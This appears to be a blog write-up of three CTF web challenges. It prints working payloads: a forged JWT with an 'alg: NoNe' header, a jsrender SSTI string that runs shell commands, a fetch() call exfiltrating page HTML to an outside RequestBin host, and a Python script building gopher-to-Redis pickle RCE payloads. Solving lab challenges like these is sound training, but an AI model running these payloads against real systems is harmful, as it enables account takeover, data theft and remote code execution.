 if (!user) {
 return res
 .status(400)
 .send(response("Invalid username or password"));
 }

 const validPassword = bcrypt.compareSync(password, user.password);
 if (!validPassword) {
 return res
 .status(400)
 .send(response("Invalid username or password"));
 }

 const token = jwt.sign({ id: user.id }, tokenKey, {
 expiresIn: "1h",
 });

 res.cookie("session", token);

 return res.status(200).send(response("Logged in successfully"));
 } catch (error) {
 console.error(error);
 res.status(500).send({
 error: "Something went wrong!",
 });
 }
 });

 ........

 router.get("/admin", AdminMiddleware, async (req, res) => {
 try {
 const users = await db.Users.findAll();
 const usernames = users.map((user) => user.username);

 res.render("admin", {
 users: jsrender.templates(`${usernames}`).render(),
 });
 } catch (error) {
 console.error(error);
 res.status(500).send("Something went wrong!");
 }
 });

 router.get("/logout", async (req, res) => {
 res.clearCookie("session");
 return res.redirect("/");
 });

 return router;
};

Okay, so it has some basic authentication funtions like register, login and logout; in addition to that we also has 2 authorization middlewares AdminMiddleware and AuthMiddleware. And they all use Json Web Token (JWT).

router.get("/admin", AdminMiddleware, async (req, res) => {
 try {
 const users = await db.Users.findAll();
 const usernames = users.map((user) => user.username);

 // This pepega jsrender things
 res.render("admin", {
 users: jsrender.templates(`${usernames}`).render(),
 });
 } catch (error) {
 console.error(error);
 res.status(500).send("Something went wrong!");
 }
});

router.get("/logout", async (req, res) => {
 res.clearCookie("session");
 return res.redirect("/");
});

return router;

What really stands out of them all is at the /admin endpoint which allows us to inject something in the template. But first, we need to bypass the AuthMiddleware. Looking what it does, we find something really interesting.

const AdminMiddleware = async (req, res, next) => {
 try {
 const sessionCookie = req.cookies.session;
 if (!sessionCookie) {
 return res.redirect("/login");
 }
 const decoded = jwt.decode(sessionCookie, { complete: true });

 if (decoded.header.alg == 'none') {
 return res.redirect("/login");
 } else if (decoded.header.alg == "HS256") {
 const user = jwt.verify(sessionCookie, tokenKey, {
 algorithms: [decoded.header.alg],
 });
 if (
 !(await db.Users.findOne({
 where: { id: user.id, username: "admin" },
 }))
 ) {
 return res.status(403).send("You are not an admin");
 }
 } else {
 const user = jwt.verify(sessionCookie, null, {
 algorithms: [decoded.header.alg],
 });
 if (
 !(await db.Users.findOne({
 where: { id: user.id, username: "admin" },
 }))
 ) {
 return res
 .status(403)
 .send({ message: "You are not an admin" });
 }
 }
 } catch (err) {
 return res.redirect("/login");
 }
 next();
};

Do you see something fun here ? It checks for the header algorith field. If it is none, it makes us login again. And if it is HS256, which basically the same algorithm it uses to authenticate, the app verifies using the random generated key. Or “else” it verifies with no key at all. This is fun because only with algorithm none, the function verify would work.

I was banging my head for a while, I realised that it doesn’t check for NoNe, NonE but it is still able to decoded and verified. That lead us to craft a JWT to pass to the session cookie for admin previlege. I crafted the JWT manually 😵‍💫.

eyJhbGciOiJOb05lIiwidHlwIjoiSldUIn0.eyJpZCI6MSwiaWF0IjoxNjc5NTk0OTY1LCJleHAiOjI2Nzk1OTg1NjV9.
{
 "alg": "None",
 "typ": "JWT"
}
{
 "id": 1,
 "iat": 1679594965,
 "exp": 2679598565
}

I modified the algorithm to None, “id” to 1 as 1 is the id of “admin” and set the expiration time to oblivion so I can take my time to get the flag.

For the flag, look again at the routes’ functions, we can get the flag through SSTI on jsrender. To do so the payload must be one of the usernames registered. Only thing we have to do now is to register a new account with the payload for the username.

{{:"pwnd".toString.constructor.call({},"return global.process.mainModule.constructor._load('child_process').execSync('cat /flag.txt').toString()")()}}

Flag is: HTB{Pr3_C0MP111N6_W17H0U7_P4DD13804rD1N6_5K1115}

SpyBug

Given file:: Get it here
Description: As Pandora made her way through the ancient tombs, she received a message from her contact in the Intergalactic Ministry of Spies. They had intercepted a communication from a rival treasure hunter who was working for the alien species. The message contained information about a digital portal that leads to a software used for intercepting audio from the Ministry’s communication channels. Can you hack into the portal and take down the aliens counter-spying operation?
Note: This challenge had a docker but it might be closed at the time you are reading this. All needed files will be given in the write-ups.
Category: Web Exploitation
Difficulty: Medium

Right, another login panel with no reigster. But wait what’s that ? Look at the source code closely, we will have 2 main routes: routes/agents and routes/main.

// agents.js
const fs = require("fs");
const path = require("path");
const { v4: uuidv4 } = require("uuid");

const express = require("express");
const router = express.Router();

const multer = require("multer");

const {
 registerAgent,
 updateAgentDetails,
 createRecording,
} = require("./../utils/database");

const authAgent = require("../middleware/authagent");

const storage = multer.diskStorage({
 filename: (req, file, cb) => {
 cb(null, uuidv4());
 },
 destination: (req, file, cb) => {
 cb(null, "./uploads");
 },
});

const multerUpload = multer({
 storage: storage,
 fileFilter: (req, file, cb) => {
 if (
 file.mimetype === "audio/wave" &&
 path.extname(file.originalname) === ".wav"
 ) {
 cb(null, true);
 } else {
 return cb(null, false);
 }
 },
});

router.get("/agents/register", async (req, res) => {
 res.status(200).json(await registerAgent());
});

router.get("/agents/check/:identifier/:token", authAgent, (req, res) => {
 res.sendStatus(200);
});

router.post(
 "/agents/details/:identifier/:token",
 authAgent,
 async (req, res) => {
 const { hostname, platform, arch } = req.body;
 if (!hostname || !platform || !arch) return res.sendStatus(400);
 await updateAgentDetails(req.params.identifier, hostname, platform, arch);
 res.sendStatus(200);
 }
);

router.post(
 "/agents/upload/:identifier/:token",
 authAgent,
 multerUpload.single("recording"),
 async (req, res) => {
 if (!req.file) return res.sendStatus(400);

 const filepath = path.join("./uploads/", req.file.filename);
 const buffer = fs.readFileSync(filepath).toString("hex");

 if (!buffer.match(/52494646[a-z0-9]{8}57415645/g)) {
 fs.unlinkSync(filepath);
 return res.sendStatus(400);
 }

 await createRecording(req.params.identifier, req.file.filename);
 res.send(req.file.filename);
 }
);

module.exports = router;


// panel.js
const express = require("express");
const router = express.Router();

const {
 checkUserLogin,
 getAgents,
 getRecordings,
} = require("./../utils/database");

const authUser = require("../middleware/authuser");

router.get("/panel", authUser, async (req, res) => {
 res.render("panel", {
 username:
 req.session.username === "admin"
 ? process.env.FLAG
 : req.session.username,
 agents: await getAgents(),
 recordings: await getRecordings(),
 });
});

router.get("/panel/logout", authUser, (req, res) => {
 req.session.destroy();
 res.redirect("/panel/login");
});

router.get("/panel/login", (req, res) => {
 res.render("login");
});

router.post("/panel/login", async (req, res) => {
 let username = req.body.username;
 let password = req.body.password;

 if (!(username && password)) return res.sendStatus(400);
 if (!(await checkUserLogin(username, password)))
 return res.redirect("/panel/login");

 req.session.loggedin = true;
 req.session.username = username;

 res.redirect("/panel");
});

module.exports = router;

Let’s summarize what they do.

routes/agent.js has register function which returns an id and a token that we can use to upload a file. And we can only upload a file with the header which is somewhat similar to WAV file. We can also modify hostname, arch and platform.

routes/panel.js which only accepts credential of admin. If the provided credential is valid, the main panel will render with the recordings that agents provide.

Let’s keep in mind that there is a bot being generated at every 60 seconds. This bot will login to the panel and review all panel at a context of a browser. This is no doubt an Client-Side challenge.

// index.js
const { visitPanel } = require("./utils/adminbot");
............
createAdmin();
setInterval(visitPanel, 60000);


// utils/adminbot.js
require("dotenv").config();

const puppeteer = require("puppeteer");

const browserOptions = {
 headless: true,
 executablePath: "/usr/bin/chromium-browser",
 args: [
 "--no-sandbox",
 "--disable-background-networking",
 "--disable-default-apps",
 "--disable-extensions",
 "--disable-gpu",
 "--disable-sync",
 "--disable-translate",
 "--hide-scrollbars",
 "--metrics-recording-only",
 "--mute-audio",
 "--no-first-run",
 "--safebrowsing-disable-auto-update",
 "--js-flags=--noexpose_wasm,--jitless",
 ],
};

exports.visitPanel = async () => {
 try {
 const browser = await puppeteer.launch(browserOptions);
 let context = await browser.createIncognitoBrowserContext();
 let page = await context.newPage();

 await page.goto("http://0.0.0.0:" + process.env.API_PORT, {
 waitUntil: "networkidle2",
 timeout: 5000,
 });

 await page.type("#username", "admin");
 await page.type("#password", process.env.ADMIN_SECRET);
 await page.click("#loginButton");

 await page.waitForTimeout(5000);
 await browser.close();
 } catch (e) {
 console.log(e);
 }
};

Well since I really wanted to know how the recordings being rendered. I will create a Docker. For those who are new to CTFs, Docker is a good way to debug what really happens behind the curtain.

For the purpose of testing I will modify ./build-docker.sh to

#!/bin/bash
docker stop web_spybug
docker rm web_spybug
docker rmi $(docker images -f dangling=true -q)
docker rmi $(docker images -q web_spybug)
docker build --tag=web_spybug .
docker run -p 1337:1337 -e API_PORT=1337 -e FLAG="HTB{f4k3_fl4g_f0r_t3st1ng}" -e SESSION_SECRET=$(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 32 | head -n 1) -e ADMIN_SECRET="admin" web_spybug

I changed the admin password from randomly generated 32 characters string to admin. Let’s build and run the docker using command ./build-docker.sh

While waiting our docker finishes building and runs. Let’s look at how are we able to perform such Client-Side XSS attack. Let’s look at the template views/panel.pug, we will find 2 places that we can place our payload.

if agents.length > 0
 table.w-100
 thead
 tr
 th ID
 th Hostname
 th Platform
 th Arch
 tbody
 each agent in agents
 tr
 td= agent.identifier
 td !{agent.hostname}
 td !{agent.platform}
 td !{agent.arch}

tbody
 each recording in recordings
 tr
 td= recording.agentId
 td
 audio(controls='')
 source(src=recording.filepath)

The first flashes through my mind is !{agent.hostname}, !{agent.platform} and !{agent.arch}. Upon reading the pug/jade document

Aaaaaah, so no escape then, so we just need to fix the hostname or platform or arch to <script>(evil xss)</script> right ? Unfortunately, it won’t work. Let’s look at the index.js again.

application.use((req, res, next) => {
 res.setHeader("Content-Security-Policy", "script-src 'self'; frame-ancestors 'none'; object-src 'none'; base-uri 'none';");
 res.setHeader("Cache-Control", "no-cache, no-store, must-revalidate");
 res.setHeader("Pragma", "no-cache");
 res.setHeader("Expires", "0");
 next();
});

There is CSP rule set that only allows source from self. What we were trying is called inline. You can read the material here.

Don’t worry, I said 2 things come to my mind while reading the template. The second thing is that the audio use our uploaded WAV file. There is a good writeup in the past that can clear your mind out. This challenge is more simple. It only checks the header, not the entire file. So we can use hexedit to edit the header of the file to WAV header and include our xss payload. You can either use hexedit on your laptop or like me use an online hexeditor.

But doesn’t it use <audio> tag, how can the script be executed ? You’re right, we can’t. However if something like <script src="our-evil-media-file.wav"></script> appears, it will execute our payload like a charm. Well how can we make it appear ? Use !{hostname} obviously.

Okay let’s go and try out our web built from the docker at localhost:1337. We can use admin:admin to login to the panel now.

You can either create a form with html to deal with the endpoints and upload file or use Postman to deal with it like me.

First me need to register an agent.

Use the id and token returned for uploading the file that contains the payload.

And finally, inject into html.

Spectacular !! Now we only need to modify our payload for it to get all content of the html page at send it to our self hosted server or maybe RequestBin. The payload I used:

// change the url of the requestbin
fetch('https://ensei2x093jq8.x.pipedream.net?muneh=' + document.documentElement.innerHTML)

Repeat all the steps above against challenge server. We will see the flag in the RequestBin we created.

Flag is: HTB{p01yg10t5_4nd_35p10n4g3}

TrapTrack

Given file:: Get it here
Description: The aliens have prepared several trap websites to spread their propaganda campaigns on the internet. Our intergalactic forensics team has recovered an artifact of their health check portal that keeps track of their trap websites. Can you take a look and see if you can infiltrate their system?
Note: This challenge had a docker but it might be closed at the time you are reading this. All needed files will be given in the write-ups.
Category: Web Exploitation
Difficulty: Hard

Right … Another login panel, excepts, now the credential is harcoded in to the source code ε-(´・｀) ﾌ

Use that cred and login to panel. Here at the panel, we see some kind of URL health checking going on.

Let’s try to put some URL in. How about our little RequestBin.

Result:

Very noice. So it really does somewhat of a CURL thing. Let’s look at the source code and this time I’ll ask ChatGPT what the challenge does.

blueprints/routes.py

import json
from application.database import db, User, TrapTracks
from flask import Blueprint, Response, jsonify, redirect, render_template, request
from flask_login import login_required, login_user, logout_user
from application.cache import get_job_list, create_job_queue, get_job_queue

web = Blueprint('web', __name__)
api = Blueprint('api', __name__)

def response(message, status=200):
 return jsonify({'message': message}), status

@web.route('/', methods=['GET'])
def login():
 return render_template('login.html')

@api.route('/login', methods=['POST'])
def user_login():
 if not request.is_json:
 return response('Missing required parameters!', 401)

 data = request.get_json()
 username = data.get('username', '')
 password = data.get('password', '')

 if not username or not password:
 return response('Missing required parameters!', 401)

 user = User.query.filter_by(username=username).first()

 if not user or not user.password == password:
 return response('Invalid username or password!', 403)

 login_user(user)
 return response('User authenticated successfully!')

@web.route('/admin/')
@login_required
def scrape_list():
 trap_tracks = TrapTracks.query.all()
 return render_template('admin.html', tracks=trap_tracks)

@api.route('/tracks/list', methods=['GET'])
@login_required
def job_list():
 data = get_job_list()

 if not data:
 return Response(json.dumps([]), mimetype='application/json')

 return Response(json.dumps(data), mimetype='application/json')

@api.route('/tracks/add', methods=['POST'])
@login_required
def tracks_add():
 if not request.is_json:
 return response('Missing required parameters!', 401)

 data = request.get_json()

 trapName = data.get('trapName', '')
 trapURL = data.get('trapURL', '')

 if not trapName or not trapURL:
 return response('Missing required parameters!', 401)

 async_job = create_job_queue(trapName, trapURL)

 track = TrapTracks(trap_name=trapName, trap_url=trapURL, track_cron_id=async_job['job_id'])

 db.session.add(track)
 db.session.commit()

 return response('Trap Track added successfully!', 200)

@api.route('/tracks/delete', methods=['POST'])
@login_required
def tracks_del():
 if not request.is_json:
 return response('Missing required parameters!', 401)

 data = request.get_json()

 trackID = data.get('id', '')

 if not trackID:
 return response('Missing required parameters!', 401)

 try:
 TrapTracks.query.filter_by(id=int(trackID)).delete()
 db.session.commit()
 except Exception as e:
 pass

 return response('Trap Track deleted successfully!', 200)


@api.route('/tracks/<int:job_id>/status', methods=['GET'])
@login_required
def job_status(job_id):
 data = get_job_queue(job_id)

 if not data:
 return response('Job does not exist!', 401)

 return Response(json.dumps(data), mimetype='application/json')

@web.route('/logout')
@login_required
def logout():
 logout_user()
 return redirect('/')

> This code is a Flask web application that has two blueprints (web and api) and uses a database to store and manage User and TrapTracks models.
>
> The web blueprint defines three routes:
>
> 1. '/' that renders a login template.
> 2. '/admin/' that requires login and renders an admin template with all TrapTracks.
> 3. '/logout' that requires login and logs out the user.
>
> The api blueprint defines four routes:
> 1. '/login' that receives a POST request with a JSON payload containing a username and password field, authenticates the user, and returns a response with a message.
> 2. '/tracks/list' that requires login and returns a response with all the TrapTracks.
> 3. '/tracks/add' that requires login and receives a POST request with a JSON payload containing a trapName and a trapURL field, adds a new TrapTrack to the database, and returns a response with a message.
> 4. '/tracks/delete' that requires login and receives a POST request with a JSON payload containing an id field that corresponds to a TrapTrack to be deleted from the database.
> The response function is a helper function that returns a JSON response with a message and an optional status.
> The code uses Flask-Login to manage user authentication and Flask-Caching to cache job data.
> --ChatGPT--

Hmmm, pretty neat, so it does keep records of all the tracks or we might say all the jobs. Let’s look deeper into how the jobs are created and executed.

from flask import current_app
import pickle, base64

def env(key):
 val = False
 try:
 val = current_app.config[key]
 finally:
 return val

def get_job_list():
 data = current_app.redis.hkeys(env('REDIS_JOBS'))
 data = [job_id.decode() for job_id in data]

 return data

def get_job_id():
 job_id = current_app.redis.get(env('REDIS_NUM_JOBS'))
 current_app.redis.incr(env('REDIS_NUM_JOBS'))
 return job_id

def create_job_queue(trapName, trapURL):
 job_id = get_job_id()

 data = {
 'job_id': int(job_id),
 'trap_name': trapName,
 'trap_url': trapURL,
 'completed': 0,
 'inprogress': 0,
 'health': 0
 }

 current_app.redis.hset(env('REDIS_JOBS'), job_id, base64.b64encode(pickle.dumps(data)))

 current_app.redis.rpush(env('REDIS_QUEUE'), job_id)

 return data

def get_job_queue(job_id):
 data = current_app.redis.hget(env('REDIS_JOBS'), job_id)
 if data:
 return pickle.loads(base64.b64decode(data))

 return None

Okay, so it has some function like:

Get all jobs’ IDs from Redis database
Get current incremented ID
Queue a job in the database
Get the data from of a job with given ID

What truely stand out of all these are these line:

def get_job_queue(job_id):
 data = current_app.redis.hget(env('REDIS_JOBS'), job_id)
 if data:
 return pickle.loads(base64.b64decode(data)) # My money maker

 return None

The principal is somewhat similar to a misc chall called Hijack. This is no doubt a pickle deserialization attack which can execute remote code, our code.

Is this the end of the challenge? Well, no. Let’s look up a few lines and see why.

def create_job_queue(trapName, trapURL):
 job_id = get_job_id()

 data = {
 'job_id': int(job_id),
 'trap_name': trapName,
 'trap_url': trapURL,
 'completed': 0,
 'inprogress': 0,
 'health': 0
 }

 current_app.redis.hset(env('REDIS_JOBS'), job_id, base64.b64encode(pickle.dumps(data))) # This line right here

 current_app.redis.rpush(env('REDIS_QUEUE'), job_id)

 return data

The data that should give us way to pass in our malicious class is actually serialized before it can be unserialized. The challenge is not that simple as it looks anymore.

Another features of the app is that health checking thing. It takes a URL and calls to URL regardless of host and protocol. This is perfect as we know Redis also runs on this challenge instance and our data is stored on it including those jobs. So if we can somehow manange this feature to change the data of a job to a pickle serialized base64 encoded string of an “evil” object, when this data os loaded, there will be RCE. This can be done with the URL health check features.

So to summarize, we will make use of SSRF vulnerabilities to change the data so it can trigger pickle deserialzation attack.

Good theory, but how can we perform such an attack. There are good resources on this:

https://infosecwriteups.com/exploiting-redis-through-ssrf-attack-be625682461b

https://trevorsaudi.medium.com/ssrf-to-gaining-rce-rootme-ssrf-box-31b7d0e5ad08

There’s a tool called Gopherus but since this challenge is more simple, I will try to modify a script on a github repo to:

from __future__ import print_function

import os
import sys
import base64
import urllib.parse
import pickle
import subprocess


def generate_resp(command):
 res = ""

 if isinstance(command, list):
 pass
 else:
 command = command.split(" ")

 res += "*{}\n".format(len(command))
 for cmd in command:
 res += "${}\n".format(len(cmd))
 res += "{}\n".format(cmd)

 return res

def generate_gopher(payload):

 final_payload = "gopher://127.0.0.1:6379/_{}".format(urllib.parse.quote(payload))
 return final_payload

class PickleExploit(object):
 def __init__(self, command):
 self.cmd = command

 def __reduce__(self):
 cmd = command
 return (os.system, (cmd,))

def pickle_payload(key, field, command):
 res = ""

 payload = pickle.dumps(PickleExploit(command))
 res += "\r\n"
 res += generate_resp("hset {} {} {}".format(key, field, base64.b64encode(payload).decode()))

 res = res.replace("\n", "\r\n")

 print(generate_gopher(res))

if sys.argv[1] == "pickle":
 key = input("Key name > ")
 field = input("Field name > ")
 command = input("Command > ")
 pickle_payload(key, field, command)

This pickle serialized thing works fine on Unix platform. It should also works fine on Windows platform usually, however if you experience any errors on your Windows machine, try to use WSL (Window Subsystem Linux), install Linux on a Virtual Machine or buy a MacBook. 💸💸💸

With that script let’s try to finalize our work. We will try to change hvalue of jobs from hfield of 100 (which is the first key:value pair of jobs). Why jobs ? Because it is the hash key that stores the jobs which contain the serialized object. Why change it ? So we can inject a evil-crafted serialized object of our own so when it is loaded, the command we want to run will be executed.

Overall the technique to solve this challenge is not too flashy, it still requires a lot of knowledge around it. Very nice chall. Hope we all learn something from it.

Flag is: HTB{tr4p_qu3u3d_t0_rc3!}

Original Posts

From FazeCT